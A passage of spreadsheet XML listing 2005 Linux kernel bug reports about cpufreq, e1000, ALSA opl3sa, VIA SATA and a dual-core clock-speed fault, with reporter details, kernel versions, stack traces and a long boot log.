+29,9 @@ printk(KERN_ERR "Warning: clock= override failed. Defaulting toPIT\n"); count_p = LATCH; + + init_cpu_khz(); + return 0; }</t>
  </si>
  <si>
    <t>speedstep-smi fails to load if CONFIG_CPU_FREQ_DEBUG is not set</t>
  </si>
  <si>
    <t>2005-11-04 16:14 UTC</t>
  </si>
  <si>
    <t>Theodor Milkov</t>
  </si>
  <si>
    <t>2011-07-30 05:19 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.14 Distribution: Debian GNU/Linux Etch Hardware Environment: IBM ThinkPad T22, Pentium III (Coppermine), i440BX Software Environment: Problem Description: cpufreq used to work with 2.6.8 and 2.6.11 kernels, but doesn't work with 2.6.12 and 2.6.14 for me. I've found that it actually works with 2.6.14 but only if kernel is compiled with CONFIG_CPU_FREQ_DEBUG option set. Steps to reproduce: Compile kernel with all allmodconfig and clear the CONFIG_CPU_FREQ_DEBUG. Then the following happens (otherwise it works): # modprobe speedstep-lib relaxed_check=1 # modprobe speedstep-smi FATAL: Error inserting speedstep_smi (/lib/modules/2.6.14/kernel/arch/i386/kernel/cpu/cpufreq/speedstep-smi.ko): No such device</t>
  </si>
  <si>
    <t>lspci missing my pcmcia tv-card</t>
  </si>
  <si>
    <t>2005-11-05 15:47 UTC</t>
  </si>
  <si>
    <t>dex1980</t>
  </si>
  <si>
    <t>2006-04-19 14:02 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: gentoo,ubuntu Hardware Environment: Laptop Targa 826T Software Environment: Problem Description: since 2.6.14 my tv-card is not detected by lspci. its a Typhoon DVB-T Duo Digital/Analog Cardbus i have copyied the old .config from the 2.6.13 kernel and used make oldconfig to compile the new kernel Steps to reproduce: use lspci</t>
  </si>
  <si>
    <t>e1000 driver crashes on NULL dereference</t>
  </si>
  <si>
    <t>2005-11-06 08:04 UTC</t>
  </si>
  <si>
    <t>Derrell Lipman</t>
  </si>
  <si>
    <t>2006-04-19 19:14 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge Hardware Environment: Motherboard: Intel D945GTPLKR Onboard 82573E Connected to 10/100 hub (not gigabit) Problem Description: The e1000 module detects an 82573E on the D945GTPLKR motherboard, and therefore enables tx_packet_filtering. The kernel then consistently crashes on the very first transmit, in e1000_transfer_dhcp_info() at e1000_main.c:2173: if (ntohs(udp-&gt;dest) == 67) because it dereferences 'udp', obtained from skb-&gt;h.uh, which is NULL. This problem occurs whether e1000 is compiled as a module or built-in to the kernel. My temporary fix for this is to have e1000_enable_tx_packet_filtering() in e1000_hw.c always set hw-&gt;tx_packet_filtering to FALSE and return FALSE regardless of 82573 detection. If tx_packet_filtering is FALSE, then e1000_transfer_dhcp_info() is never called, thus avoiding the problem. Everything else appears to work correctly. For taking advantage of 82573E capabilities, however, this seems not to be the appropriate long-term fix.</t>
  </si>
  <si>
    <t>Debug: sleeping function called from invalid context</t>
  </si>
  <si>
    <t>2.6.14-git9</t>
  </si>
  <si>
    <t>2005-11-06 21:11 UTC</t>
  </si>
  <si>
    <t>2005-11-13 07:35 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur:2.6.14 Distribution: SuSE 10.0 Hardware Environment: HP ze1115 notebook with Mobile Duron K7 Software Environment: gcc 4.0.2 Problem Description: Steps to reproduce: Happens repeatedly each boot The current kernel (2.6.14-git9) generates a debug message on an HP ze1115 notebook with a mobile AMD Duron(tm) stepping 01 processor. Kernel command line: root=/dev/hda6 vga=0x314 selinux=0 resume=/dev/hda3 splash=silent psmouse.proto=bare. Debug: sleeping function called from invalid context at include/linux/rwsem.h:43 in_atomic():1, irqs_disabled():0 [&lt;c0103d9e&gt;] dump_stack+0x1e/0x20 [&lt;c0117231&gt;] __might_sleep+0xa1/0xc0 [&lt;c028ef95&gt;] cpufreq_notify_transition+0x45/0x220 [&lt;ddae1448&gt;] change_speed+0x78/0xf0 [powernow_k7] [&lt;ddae190b&gt;] powernow_target+0x4b/0x60 [powernow_k7] [&lt;c02902af&gt;] __cpufreq_driver_target+0x5f/0x70 [&lt;ddb194e1&gt;] dbs_check_cpu+0x151/0x1c0 [cpufreq_ondemand] [&lt;ddb19582&gt;] do_dbs_timer+0x32/0x70 [cpufreq_ondemand] [&lt;c012b7c6&gt;] worker_thread+0x1c6/0x2b0 [&lt;c012ff5c&gt;] kthread+0xac/0xb0 [&lt;c010100d&gt;] kernel_thread_helper+0x5/0x18 Using the git bisect method, I determined that c32b6b8e524d2c337767d312814484d9289550cf is first bad commit Author: Ashok Raj &lt;ashok.raj@xxxxxxxxx&gt; Date: Sun Oct 30 14:59:54 2005 -0800 [PATCH] create and destroy cpufreq sysfs entries based on cpu notifiers cpufreq entries in sysfs should only be populated when CPU is online state. When we either boot with maxcpus=x and then boot the other cpus by echoing to sysfs online file, these entries should be created and destroyed when CPU_DEAD is notified. Same treatement as cache entries under sysfs. We place the processor in the lowest frequency, so hw managed P-State transitions can still work on the other threads to save power. Primary goal was to just make these directories appear/disapper dynamically. There is one in this patch i had to do, which i really dont like myself but probably best if someone handling the cpufreq infrastructure could give this code right treatment if this is not acceptable. I guess its probably good for the first cut. - Converting lock_cpu_hotplug()/unlock_cpu_hotplug() to disable/enable preempt. The locking was smack in the middle of the notification path, when the hotplug is already holding the lock. I tried another solution to avoid this so avoid taking locks if we know we are from notification path. The solution was getting very ugly and i decided this was probably good for this iteration until someone who understands cpufreq could do a better job than me. (akpm: export cpucontrol to GPL modules: drivers/cpufreq/cpufreq_stats.c now does lock_cpu_hotplug()) Signed-off-by: Ashok Raj &lt;ashok.raj@xxxxxxxxx&gt; Signed-off-by: Venkatesh Pallipadi &lt;venkatesh.pallipadi@xxxxxxxxx&gt; Cc: Dave Jones &lt;davej@xxxxxxxxxxxxxxxxx&gt; Cc: Zwane Mwaikambo &lt;zwane@xxxxxxxxxxxxxx&gt; Cc: Greg KH &lt;greg@xxxxxxxxx&gt; Signed-off-by: Andrew Morton &lt;akpm@xxxxxxxx&gt; Signed-off-by: Linus Torvalds &lt;torvalds@xxxxxxxx&gt; :040000 040000 0892a56c73b43a6984224f16ac60e742d4d22588 e87c14eb9bb5a06b0cf4ff668f794bfa4dc2968d M drivers :040000 040000 3cad3076f6bc2372704f09bed50e77f7a5f26192 b8a5721cc1a2730bc38c6c34dbd57493713db7bb M kernel</t>
  </si>
  <si>
    <t>Support Via 8251 southbridge SATA</t>
  </si>
  <si>
    <t>2.6.11, 2.6.12</t>
  </si>
  <si>
    <t>2005-11-07 16:03 UTC</t>
  </si>
  <si>
    <t>Chris Kloosterman</t>
  </si>
  <si>
    <t>2006-09-10 05:53 UTC</t>
  </si>
  <si>
    <t>Distro: Gentoo 2005.0 live cd, Ubuntu 5.10, etc. The SATA II controller provided by the Via 8251 southbridge (example motherboard: the Asus A8V-MX) is not detected on kernel boot regardless of the mode it's in (SATA, RAID, or AHCI). As this is an AHCI-compatible controller, I tried inserting the ahci module, but the drives were not detected. I couldn't find any reference to the VT8251 southbridge at all in the 2.6.13 or 2.6.14 changelogs, other than support for the sound output added in 2.6.13.</t>
  </si>
  <si>
    <t>opl3sa driver broken in 2.6.14</t>
  </si>
  <si>
    <t>2005-11-08 01:12 UTC</t>
  </si>
  <si>
    <t>Nick Battle</t>
  </si>
  <si>
    <t>2006-08-10 08:17 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did not occur: 2.6.13 Distribution: SuSE 9.2, though with a standard kernel and custom build Hardware Environment: Intel AL440LX with onboard OPL3SA sound Software Environment: 2.6.14, ALSA 1.0.10rc1, all drivers built-in Problem Description: The opl3sa device is initially recognised by ISA PNP, producing the following in dmesg: isapnp: Scanning for PnP cards... isapnp: Card 'OPL3-SA3 Snd System' isapnp: 1 Plug &amp; Play card detected total But when ALSA comes to initialise the device, it raises an error: Advanced Linux Sound Architecture Driver Version 1.0.10rc1 (Mon Sep 12 08:13:09 2005 UTC). pnp: Device 00:01.00 activated. pnp: Device 00:01.00 disabled. opl3sa2-pnpbios: probe of 00:01.00 failed with error -2 ALSA device list: No soundcards found. Booting with a standard 2.6.13 kernel works perfectly, as: Advanced Linux Sound Architecture Driver Version 1.0.9b (Thu Jul 28 12:20:13 2005 UTC). pnp: Device 00:01.00 activated. ALSA device list: #0: Yamaha OPL3-SA23 at 0x370, irq 5, dma 0&amp;1 At Zwane's suggestion, I tried applying the following patch, but the problem persists: # HG changeset patch # User Linus Torvalds &lt;torvalds@g5.osdl.org&gt; # Node ID 49cffba393b72570babb29fcc612090d76335af0 # Parent cce48df4d10de2a2a3312abe5f6b3b3f6d2004e8 Fix PIIX4 SMB region size Relevant looking .config settings are: CONFIG_SND=y CONFIG_SND_TIMER=y CONFIG_SND_PCM=y CONFIG_SND_HWDEP=y CONFIG_SND_RAWMIDI=y CONFIG_SND_SEQUENCER=y CONFIG_SND_SEQ_DUMMY=y CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_GENERIC_DRIVER=y CONFIG_SND_MPU401_UART=y CONFIG_SND_OPL3_LIB=y CONFIG_SND_MPU401=y CONFIG_SND_CS4231_LIB=y CONFIG_SND_OPL3SA2=y Steps to reproduce: boot OPL3SA device with 2.6.14 Zwane has full dmesg outputs for 2.6.13 and 2.6.14, together with the respective .config files.</t>
  </si>
  <si>
    <t>Null point in video/lcd/brightness</t>
  </si>
  <si>
    <t>2005-11-08 05:27 UTC</t>
  </si>
  <si>
    <t>2005-12-05 14:17 UTC</t>
  </si>
  <si>
    <t>patch attached</t>
  </si>
  <si>
    <t>2.6.13, 2.6.14</t>
  </si>
  <si>
    <t>dual-core athlon x2 + SMP = system clock running twice normal speed</t>
  </si>
  <si>
    <t>2005-11-08 14:42 UTC</t>
  </si>
  <si>
    <t>Christopher Mulcahy</t>
  </si>
  <si>
    <t>2006-07-10 11:28 UTC</t>
  </si>
  <si>
    <t xml:space="preserve">Most recent kernel where this bug did not occur: TBD Distribution: ubuntu ( vanilla kernel ) Hardware Environment: Athlon X2 3800, ATI IXP chipset Software Environment: Problem Description: System clock runs at twice normal speed. Steps to reproduce: hardware dependent Note `cat /proc/interrupts`: CPU0 CPU1 0: 31735152 32097853 IO-APIC-edge timer 1: 331 89923 IO-APIC-edge i8042 8: 0 0 IO-APIC-edge rtc 12: 10261 2608018 IO-APIC-edge i8042 15: 45066 11252551 IO-APIC-edge ide1 17: 1682 450612 IO-APIC-level libata 18: 63204 48758860 IO-APIC-level ehci_hcd:usb1, ohci_hcd:usb2, ohci_hcd:usb3 19: 2155 514727 IO-APIC-level eth0 20: 74 19249 IO-APIC-level ATI IXP 21: 0 2 IO-APIC-level acpi, ohci1394 NMI: 2974 4067 LOC: 31915443 31915434 ERR: 154 MIS: 0 Dmesg: [ 0.000000] Bootdata ok (command line is root=/dev/sda2 ro) [ 0.000000] Linux version 2.6.14 (root@jones) (gcc version 4.0.2 20050808 (prerelease) (Ubuntu 4.0.1-4ubuntu9)) #9 SMP Sat Nov 5 11:02:37 EST 2005 [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009f400 (usable) [ 0.000000] BIOS-e820: 000000000009f400 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000003fef0000 (usable) [ 0.000000] BIOS-e820: 000000003fef0000 - 000000003fef3000 (ACPI NVS) [ 0.000000] BIOS-e820: 000000003fef3000 - 000000003ff00000 (ACPI data) [ 0.000000] BIOS-e820: 00000000e0000000 - 00000000f0000000 (reserved) [ 0.000000] BIOS-e820: 00000000fec00000 - 0000000100000000 (reserved) [ 0.000000] ACPI: RSDP (v000 HP-CPC ) @ 0x00000000000f8840 [ 0.000000] ACPI: RSDT (v001 HP-CPC AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000003fef3040 [ 0.000000] ACPI: FADT (v002 HP-CPC AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000003fef30c0 [ 0.000000] ACPI: SSDT (v001 HP-CPC POWERNOW 0x00000001 LTP 0x00000001) @ 0x000000003fef6d80 [ 0.000000] ACPI: SRAT (v001 HP-CPC HAMMER 0x00000001 AMD 0x00000001) @ 0x000000003fef6f80 [ 0.000000] ACPI: MCFG (v001 HP-CPC AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000003fef7080 [ 0.000000] ACPI: MADT (v001 HP-CPC AWRDACPI 0x42302e31 AWRD 0x00000000) @ 0x000000003fef6cc0 [ 0.000000] ACPI: DSDT (v001 HP-CPC AWRDACPI 0x00001000 MSFT 0x0100000e) @ 0x0000000000000000 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 1 -&gt; Node 0 [ 0.000000] SRAT: Node 0 PXM 0 0-9ffff [ 0.000000] SRAT: Node 0 PXM 0 0-3fffffff [ 0.000000] Using 20 for the hash shift. Max adder is 3feeffff [ 0.000000] Bootmem setup node 0 0000000000000000-000000003feeffff [ 0.000000] On node 0 totalpages: 261774 [ 0.000000] DMA zone: 3999 pages, LIFO batch:1 [ 0.000000] Normal zone: 257775 pages, LIFO batch:31 [ 0.000000] HighMem zone: 0 pages, LIFO batch:1 [ 0.000000] ACPI: PM-Timer IO Port: 0x4008 [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) [ 0.000000] Processor #0 15:3 APIC version 16 [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) [ 0.000000] Processor #1 15:3 APIC version 16 [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x00] high edge lint[0x1]) [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) [ 0.000000] ACPI: IOAPIC (id[0x02] address[0xfec00000] gsi_base[0]) [ 0.000000] IOAPIC[0]: apic_id 2, version 33, address 0xfec00000, GSI 0-23 [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 21 low level) [ 0.000000] ACPI: IRQ0 used by override. [ 0.000000] ACPI: IRQ2 used by override. [ 0.000000] Setting APIC routing to flat [ 0.000000] Using ACPI (MADT) for SMP configuration information [ 0.000000] Allocating PCI resources starting at 40000000 (gap: 3ff00000:a0100000) [ 0.000000] Checking aperture... [ 0.000000] CPU 0: aperture @ 260000000 size 32 MB [ 0.000000] Aperture from northbridge cpu 0 too small (32 MB) [ 0.000000] No AGP bridge found [ 0.000000] Built 1 zonelists [ 0.000000] Kernel command line: root=/dev/sda2 ro [ 0.000000] Initializing CPU#0 [ 0.000000] PID hash table entries: 4096 (order: 12, 131072 bytes) [ 0.000000] time.c: Using 3.579545 MHz PM timer. [ 0.000000] time.c: Detected 1989.913 MHz processor. [ 28.945072] Console: colour VGA+ 80x25 [ 28.948003] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) [ 28.948888] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) [ 28.957549] Memory: 1026704k/1047488k available (2781k kernel code, 20396k reserved, 943k data, 216k init) [ 29.101168] Calibrating delay using timer specific routine.. 3985.82 BogoMIPS (lpj=19929136) [ 29.101349] Mount-cache hash table entries: 256 [ 29.101510] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 29.101586] CPU: L2 Cache: 512K (64 bytes/line) [ 29.101652] CPU 0(2) -&gt; Node 0 -&gt; Core 0 [ 29.101719] mtrr: v2.0 (20020519) [ 29.224525] Using local APIC timer interrupts. [ 29.274792] Detected 12.436 MHz APIC timer. [ 29.274945] Booting processor 1/2 APIC 0x1 [ 29.283897] Initializing CPU#1 [ 29.359494] Calibrating delay using timer specific routine.. 2986.33 BogoMIPS (lpj=14931665) [ 29.359500] CPU: L1 I Cache: 64K (64 bytes/line), D cache 64K (64 bytes/line) [ 29.359502] CPU: L2 Cache: 512K (64 bytes/line) [ 29.359504] CPU 1(2) -&gt; Node 0 -&gt; Core 1 [ 29.359579] AMD Athlon(tm) 64 X2 Dual Core Processor 3800+ stepping 02 [ 29.359587] CPU 1: Syncing TSC to CPU 0. [ 29.361055] CPU 1: synchronized TSC with CPU 0 (last diff -77 cycles, maxerr 545 cycles) [ 29.361059] Brought up 2 CPUs [ 29.361764] Disabling vsyscall due to use of PM timer [ 29.361832] time.c: Using PM based timekeeping. [ 29.361897] testing NMI watchdog ... OK. [ 29.462338] NET: Registered protocol family 16 [ 29.462422] ACPI: bus type pci registered [ 29.462488] PCI: Using configuration type 1 [ 29.462980] ACPI: Subsystem revision 20050902 [ 29.475572] ACPI: Interpreter enabled [ 29.475634] ACPI: Using IOAPIC for interrupt routing [ 29.476198] ACPI: PCI Root Bridge [PCI0] (0000:00) [ 29.476266] PCI: Probing PCI hardware (bus 00) [ 29.476420] ACPI: Assume root bridge [\_SB_.PCI0] bus is 0 [ 29.478138] PCI: Ignoring BAR0-3 of IDE controller 0000:00:14.1 [ 29.478531] Boot video device is 0000:01:02.0 [ 29.478753] PCI: Transparent bridge - 0000:00:14.4 [ 29.478848] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] [ 29.494109] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 10 11) *0, disabled. [ 29.494538] ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 10 11) *0, disabled. [ 29.494969] ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 10 11) *0, disabled. [ 29.495391] ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 10 11) *0, disabled. [ 29.495814] ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 *10 11) [ 29.496174] ACPI: PCI Interrupt Link [LNKF] (IRQs *3 4 5 6 7 10 11) [ 29.496533] ACPI: PCI Interrupt Link [LNK0] (IRQs 3 4 5 6 7 10 *11), disabled. [ 29.496942] ACPI: PCI Interrupt Link [LNK1] (IRQs 3 4 5 6 7 10 11) *0, disabled. [ 29.497484] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.P2P_._PRT] [ 29.499794] SCSI subsystem initialized [ 29.499896] usbcore: registered new driver usbfs [ 29.499984] usbcore: registered new driver hub [ 29.500106] PCI: Using ACPI for IRQ routing [ 29.500171] PCI: If a device doesn't work, try "pci=routeirq". If it helps, post a report [ 29.500293] PCI: Cannot allocate resource region 3 of device 0000:00:00.0 [ 29.500463] PCI-DMA: Disabling IOMMU. [ 29.501185] PCI: Bridge: 0000:00:14.4 [ 29.501248] IO window: e000-efff [ 29.501314] MEM window: fb000000-fcffffff [ 29.501381] PREFETCH window: d8000000-dfffffff [ 29.501632] IA32 emulation $Id: sys_ia32.c,v 1.32 2002/03/24 13:02:28 ak Exp $ [ 29.502529] VFS: Disk quotas dquot_6.5.1 [ 29.502607] Dquot-cache hash table entries: 512 (order 0, 4096 bytes) [ 29.502744] SGI XFS with ACLs, security attributes, large block/inode numbers, no debug enabled [ 29.503025] Initializing Cryptographic API [ 29.503226] ACPI: Power Button (FF) [PWRF] [ 29.503296] ACPI: Power Button (CM) [PWRB] [ 29.503490] ACPI: CPU0 (power states: C1[C1]) [ 29.503579] ACPI: Processor [CPU0] (supports 8 throttling states) [ 29.503684] ACPI: CPU1 (power states: C1[C1]) [ 29.503772] ACPI: Processor [CPU1] (supports 8 throttling states) [ 29.516272] Real Time Clock Driver v1.12 [ 29.516340] Linux agpgart interface v0.101 (c) Dave Jones [ 29.518649] serio: i8042 AUX port at 0x60,0x64 irq 12 [ 29.518831] serio: i8042 KBD port at 0x60,0x64 irq 1 [ 29.518900] Serial: 8250/16550 driver $Revision: 1.90 $ 4 ports, IRQ sharing enabled [ 29.519307] io scheduler noop registered [ 29.519404] io scheduler anticipatory registered [ 29.519488] io scheduler deadline registered [ 29.519579] io scheduler cfq registered [ 29.519961] RAMDISK driver initialized: 16 RAM disks of 65536K size 1024 blocksize [ 29.520116] Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 [ 29.520190] ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx [ 29.520336] ATIIXP: IDE controller at PCI slot 0000:00:14.1 [ 29.520423] ACPI: PCI Interrupt 0000:00:14.1[A] -&gt; GSI 16 (level, low) -&gt; IRQ 16 [ 29.520552] ATIIXP: chipset revision 0 [ 29.520614] ATIIXP: not 100% native mode: will probe irqs later [ 29.520710] ide0: BM-DMA at 0xf800-0xf807, BIOS settings: hda:pio, hdb:pio [ 29.520855] ide1: BM-DMA at 0xf808-0xf80f, BIOS settings: hdc:pio, hdd:pio [ 29.520994] Probing IDE interface ide0... [ 29.824222] Probing IDE interface ide1... [ 30.224175] hdc: HP DVD Writer 740b, ATAPI CD/DVD-ROM drive [ 30.643685] hdd: IDE-DVD DROM6216, ATAPI CD/DVD-ROM drive [ 30.673285] ide1 at 0x170-0x177,0x376 on irq 15 [ 30.673680] Probing IDE interface ide0... [ 30.984980] hdc: ATAPI 40X DVD-ROM DVD-R CD-R/RW drive, 2048kB Cache [ 30.985144] Uniform CD-ROM driver Revision: 3.20 [ 30.989230] hdd: ATAPI 40X DVD-ROM drive, 512kB Cache [ 30.992088] libata version 1.12 loaded. [ 30.992115] sata_sil version 0.9 [ 30.992139] ACPI: PCI Interrupt 0000:00:12.0[A] -&gt; GSI 22 (level, low) -&gt; IRQ 17 [ 30.992492] ata1: SATA max UDMA/100 cmd 0xFFFFC20000004080 ctl 0xFFFFC2000000408A bmdma 0xFFFFC20000004000 irq 17 [ 30.992645] ata2: SATA max UDMA/100 cmd 0xFFFFC200000040C0 ctl 0xFFFFC200000040CA bmdma 0xFFFFC20000004008 irq 17 [ 31.189275] ata1: dev 0 cfg 49:2f00 82:3069 83:7f69 84:4163 85:3069 86:3e01 87:4063 88:203f [ 31.189279] ata1: dev 0 ATA, max UDMA/100, 488397168 sectors: lba48 [ 31.189512] ata1: dev 0 configured for UDMA/100 [ 31.189580] scsi0 : sata_sil [ 31.298704] ata2: no device found (phy stat 00000000) [ 31.298772] scsi1 : sata_sil [ 31.298917] Vendor: ATA Model: HDT722525DLA380 Rev: V44O [ 31.299355] Type: Direct-Access ANSI SCSI revision: 05 [ 31.300583] SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) [ 31.300668] SCSI device sda: drive cache: write back [ 31.300784] SCSI device sda: 488397168 512-byte hdwr sectors (250059 MB) [ 31.300867] SCSI device sda: drive cache: write back [ 31.300936] sda: sda1 sda2 sda3 sda4 &lt; sda5 sda6 sda7 &gt; [ 31.339865] Attached scsi disk sda at scsi0, channel 0, id 0, lun 0 [ 31.339993] Attached scsi generic sg0 at scsi0, channel 0, id 0, lun 0, type 0 [ 31.340109] usbmon: debugfs is not available [ 31.340218] ACPI: PCI Interrupt 0000:00:13.2[A] -&gt; GSI 19 (level, low) -&gt; IRQ 18 [ 31.340507] ehci_hcd 0000:00:13.2: EHCI Host Controller [ 31.340722] ehci_hcd 0000:00:13.2: new USB bus registered, assigned bus number 1 [ 31.340840] ehci_hcd 0000:00:13.2: irq 18, io mem 0xfe02c000 [ 31.340947] ehci_hcd 0000:00:13.2: USB 2.0 initialized, EHCI 1.00, driver 10 Dec 2004 [ 31.341148] hub 1-0:1.0: USB hub found [ 31.341214] hub 1-0:1.0: 8 ports detected [ 31.398630] ohci_hcd: 2005 April 22 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI) [ 31.398683] ACPI: PCI Interrupt 0000:00:13.0[A] -&gt; GSI 19 (level, low) -&gt; IRQ 18 [ 31.398934] ohci_hcd 0000:00:13.0: OHCI Host Controller [ 31.399124] ohci_hcd 0000:00:13.0: new USB bus registered, assigned bus number 2 [ 31.399239] ohci_hcd 0000:00:13.0: irq 18, io mem 0xfe02e000 [ 31.431654] hub 2-0:1.0: USB hub found [ 31.431724] hub 2-0:1.0: 4 ports detected [ 31.488527] ACPI: PCI Interrupt 0000:00:13.1[A] -&gt; GSI 19 (level, low) -&gt; IRQ 18 [ 31.491222] ohci_hcd 0000:00:13.1: OHCI Host Controller [ 31.491414] ohci_hcd 0000:00:13.1: new USB bus registered, assigned bus number 3 [ 31.491529] ohci_hcd 0000:00:13.1: irq 18, io mem 0xfe02d000 [ 31.521557] hub 3-0:1.0: USB hub found [ 31.521627] hub 3-0:1.0: 4 ports detected [ 31.578420] USB Universal Host Controller Interface driver v2.3 [ 31.578531] Initializing USB Mass Storage driver... [ 31.638356] usbcore: registered new driver usb-storage [ 31.638424] USB Mass Storage support registered. [ 31.638534] mice: PS/2 mouse device common for all mice [ 31.638604] i2c /dev entries driver [ 31.639071] NET: Registered protocol family 2 [ 31.667602] input: AT Translated Set 2 keyboard on isa0060/serio0 [ 31.758208] IP route cache hash table entries: 32768 (order: 6, 262144 bytes) [ 31.758486] TCP established hash table entries: 131072 (order: 9, 2097152 bytes) [ 31.759750] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes) [ 31.760396] TCP: Hash tables configured (established 131072 bind 65536) [ 31.760472] TCP reno registered [ 31.760609] TCP bic registered [ 31.760668] NET: Registered protocol family 8 [ 31.760732] NET: Registered protocol family 20 [ 31.777367] kjournald starting. Commit interval 5 seconds [ 31.777443] EXT3-fs: mounted filesystem with ordered data mode. [ 31.777527] VFS: Mounted root (ext3 filesystem) readonly. [ 31.777754] Freeing unused kernel memory: 216k freed [ 31.798126] usb 3-4: new full speed USB device using ohci_hcd and address 2 [ 31.915027] scsi2 : SCSI emulation for USB Mass Storage devices [ 31.915252] usb-storage: device found at 2 [ 31.915254] usb-storage: waiting for device to settle before scanning [ 32.308762] NET: Registered protocol family 1 [ 34.410331] Vendor: Generic Model: USB SD Reader Rev: 1.00 [ 34.410790] Type: Direct-Access ANSI SCSI revision: 00 [ 34.444071] Attached scsi removable disk sdb at scsi2, channel 0, id 0, lun 0 [ 34.445629] Attached scsi generic sg1 at scsi2, channel 0, id 0, lun 0, type 0 [ 34.450929] Vendor: Generic Model: USB CF Reader Rev: 1.01 [ 34.451366] Type: Direct-Access ANSI SCSI revision: 00 [ 34.481028] Attached scsi removable disk sdc at scsi2, channel 0, id 0, lun 1 [ 34.482406] Attached scsi generic sg2 at scsi2, channel 0, id 0, lun 1, type 0 [ 34.486906] Vendor: Generic Model: USB SM Reader Rev: 1.02 [ 34.487349] Type: Direct-Access ANSI SCSI revision: 00 [ 34.513485] Adding 3908512k swap on /dev/sda3. Priority:-1 extents:1 across:3908512k [ 34.516982] Attached scsi removable disk sdd at scsi2, channel 0, id 0, lun 2 [ 34.518052] Attached scsi generic sg3 at scsi2, channel 0, id 0, lun 2, type 0 [ 34.522858] Vendor: Generic Model: USB MS Reader Rev: 1.03 [ 34.523299] Type: Direct-Access ANSI SCSI revision: 00 [ 34.554906] Attached scsi removable disk sde at scsi2, channel 0, id 0, lun 3 [ 34.555064] Attached scsi generic sg4 at scsi2, channel 0, id 0, lun 3, type 0 [ 34.556521] usb-storage: device scan complete [ 34.560757] EXT3 FS on sda2, internal journal [ 35.309936] parport0: PC-style at 0x378 [PCSPP,EPP] [ 35.359394] lp0: using parport0 (polling). [ 35.414552] ieee1394: Initialized config rom entry `ip1394' [ 35.427883] sbp2: $Rev: 1306 $ Ben Collins &lt;bcollins@debian.org&gt; [ 35.427961] ieee1394: sbp2: Driver forced to serialize I/O (serialize_io=1) [ 35.428036] ieee1394: sbp2: Try serialize_io=0 for better performance [ 36.308347] input: ImExPS/2 Generic Explorer Mouse on isa0060/serio1 [ 36.583801] ts: Compaq touchscreen protocol output [ 38.956283] cdrom: open failed. [ 38.960647] cdrom: open failed. [ 39.347189] kjournald starting. Commit interval 5 seconds [ 39.347412] EXT3 FS on sda1, internal journal [ 39.347491] EXT3-fs: mounted filesystem with ordered data mode. [ 39.348425] kjournald starting. Commit interval 5 seconds [ 39.348652] EXT3 FS on sda5, internal journal [ 39.348729] EXT3-fs: mounted filesystem with ordered data mode. [ 39.350979] kjournald starting. Commit interval 5 seconds [ 39.351243] EXT3 FS on sda7, internal journal [ 39.351319] EXT3-fs: mounted filesystem with ordered data mode. [ 39.352197] kjournald starting. Commit interval 5 seconds [ 39.352389] EXT3 FS on sda6, internal journal [ 39.352466] EXT3-fs: mounted filesystem with ordered data mode. [ 40.363801] ohci1394: $Rev: 1313 $ Ben Collins &lt;bcollins@debian.org&gt; [ 40.363905] ACPI: PCI Interrupt 0000:01:04.0[A] -&gt; GSI 21 (level, low) -&gt; IRQ 21 [ 40.364032] PCI: Via IRQ fixup for 0000:01:04.0, from 255 to 5 [ 40.406485] ohci1394: fw-host0: OHCI-1394 1.1 (PCI): IRQ=[21] MMIO=[fcffe000-fcffe7ff] Max Packet=[2048] [ 40.695855] 8139too Fast Ethernet driver 0.9.27 [ 40.696293] ACPI: PCI Interrupt 0000:01:03.0[A] -&gt; GSI 20 (level, low) -&gt; IRQ 19 [ 40.697736] eth0: RealTek RTL8139 at 0xffffc2000021a000, 00:13:d3:4e:3c:43, IRQ 19 [ 40.697851] eth0: Identified 8139 chip type 'RTL-8100B/8139D' [ 41.068799] ieee1394: Host added: ID:BUS[0-00:1023] GUID[0010dc0000b389df] [ 42.184588] ACPI: PCI Interrupt 0000:00:14.5[B] -&gt; GSI 17 (level, low) -&gt; IRQ 20 [ 42.873761] 8139cp: 10/100 PCI Ethernet driver v1.2 (Mar 22, 2004) [ 44.419673] eth0: link up, 100Mbps, full-duplex, lpa 0x41E1 [ 45.839452] NET: Registered protocol family 10 [ 45.839660] 